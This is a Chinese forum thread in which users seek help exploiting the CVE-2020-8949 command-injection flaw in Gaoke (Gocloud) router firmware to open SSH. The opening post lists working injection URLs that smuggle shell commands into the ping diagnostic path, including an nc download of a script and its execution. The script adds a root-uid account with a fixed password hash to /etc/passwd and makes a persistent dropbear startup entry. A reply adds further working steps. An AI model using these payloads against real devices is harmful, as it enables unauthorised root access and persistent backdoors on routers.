找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 5463|回复: 14

[k2p] 高恪5.2注入破解请教

[复制链接]
主要参考Gocloud高恪固件CVE-2020-8949漏洞利用打开SSH(poc支持5.2最新版测试通过)
底包版本:4.0.2.12651
功能包版本:5.2.0.19646 (漏洞确实存在)
记录几条命令:
  1. reboot
  2. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60reboot%60/5/6/a.com
  3. nc 192.168.77.166 4444 > a.sh
  4. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60nc%20192.168.1.166%204444%20%3E%20a.sh%60/5/6/a.com
  5. ls -l (两种写法, 效果相同)
  6. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60ls%20-l%60/5/6/a.com
  7. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bls%20-l%202%3E%261%3B%20/5/6/a.com
  8. chmod +x a.sh
  9. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60chmod%20%2Bx%20a.sh%60/5/6/a.com
  10. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bchmod%20%2Bx%20a.sh%202%3E%261%3B%20/5/6/a.com
  11. sh a.sh
  12. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bsh%20%20a.sh%202%3E%261%3B%20/5/6/a.com
复制代码

a.sh的内容(完全照抄参考文):

  1. #!/bin/sh
  2. # ls -l /etc/dropbear
  3. # ls -l /etc/init.d
  4. # ls -l /etc/rc.d
  5. # cat /etc/init.d/dropbear
  6. # cat /etc/init.d/rcS
  7. echo "Generate host key"
  8. rm -rf /etc/dropbear/dropbear_rsa_host_key
  9. rm -rf /etc/dropbear/dropbear_dss_host_key
  10. /usr/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
  11. /usr/bin/dropbearkey -t dss -f /etc/dropbear/dropbear_dss_host_key
  12. # echo "Exec /etc/init.d/dropbear"
  13. # chmod +x /etc/init.d/dropbear
  14. # /etc/init.d/dropbear enable
  15. # /etc/init.d/dropbear start
  16. echo "Check host key"
  17. ls -l /etc/dropbear
  18. date

  19. echo "Add User sumu password admin"
  20. cat>>/etc/passwd<<EOF
  21. sumu:\$1\$aLBvC2Ao\$E4V2uG3GNwhlWczjZXb.31:0:0:root:/root:/bin/ash
  22. EOF

  23. echo "Update /etc/rc.local"
  24. cat>/etc/rc.local<<EOF
  25. # Put your custom commands here that should be executed once
  26. # the system init finished. By default this file does nothing.
  27. # /etc/init.d/dropbear start
  28. /usr/sbin/dropbear
  29. exit 0
  30. EOF

  31. echo "Check /etc/rc.local"
  32. cat /etc/rc.local

  33. echo "Start dropbear"
  34. dropbear
复制代码


执行脚本后得到了如下回显信息:

从 "Check host key" 步骤就开始出错了, 似乎路径不对..

请大侠指点

最新的5.2.0.20018漏洞似乎还没找到...

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
 楼主| | 显示全部楼层
漏洞确实存在, 就是dropbare的路径似乎不对
小白对命令行下破解操作实在是不熟悉
求大侠出手
回复

使用道具 举报

好高级,我就想要个NAT1就好
回复

使用道具 举报

大佬能做个低版本的NAT1+去广告+违禁词语的吗?
回复

使用道具 举报

破解后能开NAT1吗?
回复

使用道具 举报

没有dropbear二进制文件,根据错误来一个一个加就行了
回复

使用道具 举报

你开了SSH有什么作用,128的肯定没用,256的才行,但是你开了SSH在添加插件,支持多少个插件?
所以高恪开SSH没意义在那
回复

使用道具 举报

新版本插件有编译好的吗,不然开Ssh没插件安装有什么用
回复

使用道具 举报

我就想要个NAT1就好
回复

使用道具 举报

没有大神去弄,我等伸手党只能......
回复

使用道具 举报

来自手机 | 显示全部楼层
我可以开ssh 和nat1
回复

使用道具 举报

来自手机 | 显示全部楼层
我可以开ssh 和nat1
回复

使用道具 举报


你好,老哥,方便交流下吗
回复

使用道具 举报

主要是这里出问题了
  1. rm -rf /etc/dropbear/dropbear_rsa_host_key
  2. rm -rf /etc/dropbear/dropbear_dss_host_key
  3. /usr/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
  4. /usr/bin/dropbearkey -t dss -f /etc/dropbear/dropbear_dss_host_key
复制代码


在下的两个文件末尾自动带上了问号
我后面上传一个脚本
  1. #!/bin/sh
  2. rm -f /etc/dropbear/*
复制代码

把/etc/dropbear/下的文件全部删除,然后每次执行1次命令上传一次脚本
  1. #!/bin/sh
  2. /usr/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
复制代码

再次上传脚本
  1. #!/bin/sh
  2. /usr/bin/dropbearkey -t dss -f /etc/dropbear/dropbear_dss_host_key
复制代码

最后上传脚本
  1. #!/bin/sh
  2. dropbear
复制代码


ps 看进程里面有没有dropbear运行,有了就用root,你自己的密码登陆ssh就行了。
回复

使用道具 举报


老哥有没有联系方式
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

欢迎大家光临恩山无线论坛上一条 /1 下一条

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-5-21 22:52

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表